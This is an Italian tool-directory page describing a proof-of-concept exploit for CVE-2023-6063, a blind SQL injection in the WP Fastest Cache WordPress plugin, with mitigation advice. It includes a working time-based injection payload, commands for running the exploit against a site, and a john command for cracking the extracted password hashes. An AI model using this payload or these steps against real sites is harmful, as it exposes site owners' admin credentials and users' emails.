Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-6063-PoC — Una prova di concetto per CVE-2023-6063, una vulnerabilità di SQL injection blind basata sul tempo in WP Fastest Cache ≤1.2.2. | Kitploit
Strumenti/GitHubGitHub/incommatose/cve-2023-6063-poc
Password CrackingAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubincommatose/cve-2023-6063-poc

CVE-2023-6063-PoC

Una prova di concetto per CVE-2023-6063, una vulnerabilità di SQL injection blind basata sul tempo in WP Fastest Cache ≤1.2.2.

Vedi Repository
21391 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

PoC per CVE-2023-6063: WP Fastest Cache 1.2.2 Iniezione SQL Cieca Non Autenticata

Static Badge Static Badge Static Badge

Una Proof of Concept per CVE-2023-6063, una vulnerabilità di iniezione SQL cieca basata sul tempo in WP Fastest Cache ≤1.2.2. Estrae password hashate (user_pass) ed email (user_email) dalla tabella wp_users abusando del cookie wordpress_logged_in.

Caratteristiche

  • Esfiltrazione dati basata sul tempo (carattere per carattere) tramite ritardi SLEEP().
  • Supporta cookie personalizzati, nomi utente target e validazione hash.

Questo script estrae:

  • ☑️ Hash delle password WordPress (MD5/PHPass).
  • ☑️ Indirizzi email associati.
  • Argomenti CLI per test flessibili (--just-hash, --just-email, --debug).

Utilizzo

Installa le dipendenze (se non sono installate):

root@kitploit:~
pip install -r requirements.txt

Utilizzo base:

root@kitploit:~
python3 poc.py -u https://vulnerable-website.com --username admin --delay 5

Opzioni complete:

root@kitploit:~
  -h, --help            mostra questo messaggio di aiuto ed esci
  -u URL, --url URL     URL completo di Wordpress per testare CVE-2023-6063
  --username USERNAME   Definisci un utente per estrarre la sua password hashata
  -d DELAY, --delay DELAY
                        Tempo di attesa per la risposta web predefinito 5, minimo 2
  -H HASH, --hash HASH  Hash da verificare nella tabella wp_users, se l'hash contiene caratteri speciali, usa apici singoli -> '<hash>'
  --domain DOMAIN       Nome del dominio per la validazione dell'email
  -c COOKIE, --cookie COOKIE
                        Specifica un nome di cookie se diverso nel tuo contesto
  --status-code STATUS_CODE
                        Usa un codice di stato positivo specifico, predefinito 200
  --debug               Maggiore verbosità
  --just-hash           Estrai solo la password hashata
  --just-email          Estrai solo il valore email per un utente

💻 Demo

Questa è una demo per l'utente admin

https://github.com/user-attachments/assets/21ea643d-3b11-401f-813f-b85abdb05890

Quando le hash delle password vengono divulgate, usa john o hashcat per decifrarle con l'algoritmo PHPass se la password è vulnerabile.

Esempio con John:

root@kitploit:~
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=phpass

🕵️‍♂️ Dettagli Tecnici

📖 Descrizione della Vulnerabilità

Il plugin WP Fastest Cache (≤1.2.2) per WordPress è vulnerabile a un'iniezione SQL cieca non autenticata tramite il cookie wordpress_logged_in. Gli attaccanti possono sfruttare questa falla per estrarre dati sensibili (ad esempio, hash delle password, indirizzi email) dalla tabella wp_users utilizzando ritardi basati sul tempo (SLEEP()) nelle query SQL.

root@kitploit:~
" AND (IF((SELECT user_pass FROM wp_users WHERE user_login="admin") LIKE 'a%', SLEEP(5), 0))-- -

🚨 Disclaimer: Usa queste informazioni solo per test di sicurezza etici con la dovuta autorizzazione. Lo sfruttamento non autorizzato è illegale.

  • CVE ID: CVE-2023-6063
  • Punteggio Vulnerabilità: 7.5 (Alto)
  • Tipo di Vulnerabilità: SQL Injection (Cieca, Basata sul Tempo)
  • Software Affetto: WP Fastest Cache (Plugin WordPress) ≤ v1.2.2

🔍 Vettore di Attacco

  • Sfruttabilità: Remota (Nessuna autenticazione richiesta)
  • Complessità dell'Attacco: Bassa (Sfruttabile tramite richieste HTTP create ad hoc)

🔥 Impatto:

  • Riservatezza: Alta (Divulga le credenziali admin)
  • Integrità: Nessuna
  • Disponibilità: Nessuna

📌 Versioni Affette

  • Versioni WP Fastest Cache ≤1.2.2

🛡️ Mitigazione

Aggiorna WP Fastest Cache alla versione >1.2.2.

  • Aggiorna a WP Fastest Cache v1.2.3 o successiva.
  • Applica regole WAF per bloccare payload SQLi nei cookie.
  • Disabilita il plugin se non in uso.

📚 Riferimenti

  • Voce NIST NVD
  • Avviso Plugin WordPress
  • Dettagli CVE

⚖️ Aspetti Legali

  • Questo script è a scopo educativo. Ottieni sempre il permesso esplicito prima di testare.
Scarica lo strumento